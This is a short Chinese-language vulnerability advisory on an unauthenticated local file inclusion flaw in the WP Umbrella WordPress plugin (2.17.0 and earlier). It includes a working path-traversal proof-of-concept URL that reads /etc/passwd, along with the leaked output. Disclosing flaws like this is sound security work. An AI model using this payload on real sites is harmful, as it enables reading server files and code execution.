
WP Umbrella: Update Backup Restore & Monitoring <= 2.17.0 - 未认证的本地文件包含
WP Umbrella: Update Backup Restore & Monitoring WordPress 插件在 2.17.0 及之前的所有版本中,通过 'umbrella-restore' 操作的 'filename' 参数存在本地文件包含漏洞。这使得未认证攻击者能够在服务器上包含并执行任意文件,从而执行这些文件中的任何 PHP 代码。此漏洞可用于绕过访问控制、获取敏感数据,或者在可以上传并包含图片及其他“安全”文件类型的情况下实现代码执行。
https://wp-dev.ddev.site/?umbrella-restore=1&filename=../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin